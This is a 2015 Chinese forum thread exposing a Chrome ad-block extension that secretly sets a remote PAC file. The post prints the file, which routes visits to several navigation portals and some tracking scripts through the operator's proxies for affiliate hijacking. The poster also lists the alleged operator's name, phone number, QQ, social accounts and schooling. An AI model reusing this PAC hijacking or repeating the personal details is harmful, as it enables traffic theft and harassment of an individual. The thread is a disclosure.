V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
yeyeye
V2EX  ›  分享发现

Chrome 插件/拓展小黄瓜视频广告拦截含有恶意代码

  •  
  •   yeyeye · 2015-06-14 13:40:31 +08:00 · 5705 次点击
    这是一个创建于 3479 天前的主题,其中的信息可能已经有所发展或是发生改变。
    插件地址
    https://chrome.google.com/webstore/detail/%E5%B0%8F%E9%BB%84%E7%93%9C%E8%A7%86%E9%A2%91%E5%B9%BF%E5%91%8A%E6%8B%A6%E6%88%AA/goppkfbpdcohaknmoabhnfclcepcjlda?utm_source=chrome-app-launcher-info-dialog

    因为之前使用的去视频去广告插件坑爹了!年久失修,于是去chrome商店看看有没有其他的合适的。
    找到《小黄瓜视频广告拦截》,试用了下,可以去广告,但是……

    我的代理切换插件不能用了 0 0……代理操作被它独占了,禁用《小黄瓜视频广告拦截》后发现SwitchyOmega颜色不太对(平时绿色,这时变成蓝色了),鼠标放上去显示……现在是一个pac文件在控制代理。



    这个pac文件的地址是 http://www.123zouni.com/proxy.pac 好奇宝宝下一步的操作大家都猜到了吧,那就是打开这个网址看看!结果…… 内容如下。

    function FindProxyForURL(url, host) {
    var regexStr = /.*?:\/\/.*?(youku|qiyi|iqiyi|letv|sohu|ku6|ku6cdn|pps)\.(com|tv)\/crossdomain\.xml/;
    if(regexStr.test(url)){
    return 'PROXY yk.pp.navi.youku.com:80';
    }
    if(/^http\:\/\/www\.9991\.com\/\?\w+/.test(url)||/^http\:\/\/www\.9991\.com\/$/.test(url)){
    return 'PROXY www.123zouni.com:30005;DIRECT;';
    }
    if((/^http\:\/\/www\.duba\.com\/\?\w+/.test(url)||/^http\:\/\/www\.duba\.com\/$/.test(url))&&!/http\:\/\/www\.duba\.com\/\?un\_4\_452915/.test(url)){
    return 'PROXY www.123zouni.com:30005;DIRECT;';
    }
    if((/^http\:\/\/123\.sogou\.com\/\?\w+/.test(url)||/^http\:\/\/123\.sogou\.com\/$/.test(url))&&!/http\:\/\/123\.sogou\.com\/\?21705/.test(url)){
    return 'PROXY www.123zouni.com:30005;DIRECT;';
    }
    if((/^http\:\/\/www\.2345\.com\/\?\w+/.test(url)||/^http\:\/\/www\.2345\.com\/$/.test(url))&&!/http\:\/\/www\.2345\.com\/\?29955/.test(url)){
    return 'PROXY www.123zouni.com:30005;DIRECT;';
    }
    if((/^http\:\/\/hao\.360\.cn\/\?\w+/.test(url)||/^http\:\/\/hao\.360\.cn\/$/.test(url))&&!/http\:\/\/hao\.360\.cn\/\?src\=lm\&ls\=n078749b590/.test(url)){
    return 'PROXY www.123zouni.com:30005;DIRECT;';
    }
    if((/^http\:\/\/www\.hao123\.com\/\?\w+/.test(url)||/^http\:\/\/www\.hao123\.com\/$/.test(url))&&!/http\:\/\/www\.hao123\.com\/\?tn\=(96445394|91784390|91783592)\_hao\_pg/.test(url)){
    return 'PROXY www.123zouni.com:30005;DIRECT;';
    }
    var regexStr123=/.*?:\/\/.*?(hao123img)\.com\/res\/js\/track\.js.*/;
    if(regexStr123.test(url)){return'PROXY 52.68.93.94:9998'}
    var regexStr360=/.*?:\/\/.*?(qhimg)\.com\/lib\/qwrap\/113\.js/;
    if(regexStr360.test(url)){return'PROXY 52.68.93.94:9998'}
    return 'DIRECT';
    }

    因为我的js是体育老师教的,但是大概也猜到,就是你访问9991.com,2345.com,hao.360.cn,hao123.com 这些网站的时候 这个网址其实是访问的另外一个网址,下面似乎还对一些js文件进行了劫持……

    而且为什么要写在pac文件里呢?最简单的原因,就是chrome官方进行审核的时候,是无法审查到这些奇怪的代码的,因为这些代码在自己网站上,随时可改……

    而且今天劫持的是这些网址站,还有一些js文件,明天又会劫持什么呢?这就不得而知了……

    顺手放狗搜了下 123zouni.com 是谁的 此人也混知乎 知乎的名字是宋超 这里也可以看到他的个人主页是 http://songchao.123zouni.com/ qq号码是 50810004 微博是 http://www.weibo.com/thinkfish1210 电话是 15001373313 博客园是 http://dachie.cnblogs.com/ http://www.cnblogs.com/dachie/ 邮箱: [email protected] 在哪上学
    2012.7-2012.8尚德培训机构PMP项目管理培训PMP证书
    2005.9-2008.6湖南城市学院园林工程技术专业大专

    这些个人信息都是他放在自己个人主页上的 不能算侵犯个人隐私吧?





    13 条回复    2015-06-14 16:29:49 +08:00
    tyhunter
        1
    tyhunter  
       2015-06-14 13:45:12 +08:00   ❤️ 1
    以前遇到植入淘宝客的推广的扩展,直接写信给Google反馈了,第二天该扩展就被下架了
    MaiCong
        2
    MaiCong  
       2015-06-14 13:47:55 +08:00 via iPhone
    这货会控制浏览器的代理,ss会无法使用,针对这种情况我是直接卸载了它。
    yeyeye
        3
    yeyeye  
    OP
       2015-06-14 13:58:31 +08:00
    @tyhunter 你够狠……

    @MaiCong 我也是因此才发现他的不良行为的。
    imn1
        4
    imn1  
       2015-06-14 14:07:07 +08:00
    确实应该按1L做法
    f0rger
        5
    f0rger  
       2015-06-14 14:08:15 +08:00
    扩展都不敢乱用了,目前用妈妈2,不过也极少用。
    等45秒,就等着吧,要不就买会员吧。
    yeyeye
        6
    yeyeye  
    OP
       2015-06-14 14:17:35 +08:00
    @f0rger 现在已经不是45秒 60秒了 2分多钟的广告都有
    n37r06u3
        7
    n37r06u3  
       2015-06-14 14:25:01 +08:00
    。。。 貌似滴滴打车的工程师
    br00k
        8
    br00k  
       2015-06-14 14:45:58 +08:00
    Mac下干掉优酷和土豆广告不用扩展。。
    tyhunter
        9
    tyhunter  
       2015-06-14 14:53:29 +08:00
    @yeyeye 这叫狠?缺钱不会在扩展设置页里设置Donate吗,用户觉得真好用自然会捐款感谢作者,需要暗地里通过我每次淘宝的购买行为从而赚钱不是更垃圾吗
    RIcter
        10
    RIcter  
       2015-06-14 15:03:11 +08:00
    你的 JavaScript 的确是体育老师教的不假。
    return 'PROXY www.123zouni.com:30005;DIRECT;';
    这句话的意思不是访问这个网址,而是用 www.123zouni.com:30005 这个代理去访问,或者是直接访问目标网站。

    当然,我不可否定的是,通过这个代理去访问,在代理上动手脚与否就无从而知了。
    Raidal
        11
    Raidal  
       2015-06-14 15:16:24 +08:00   ❤️ 1
    楼主可以试试这款ADfree.Player.Offline,一直用着很稳定
    EchoChan
        12
    EchoChan  
       2015-06-14 15:55:00 +08:00
    同意一楼,也去举报了。
    sghsgh
        13
    sghsgh  
       2015-06-14 16:29:49 +08:00
    ABP一直用这个
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2695 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 21ms · UTC 08:24 · PVG 16:24 · LAX 00:24 · JFK 03:24
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.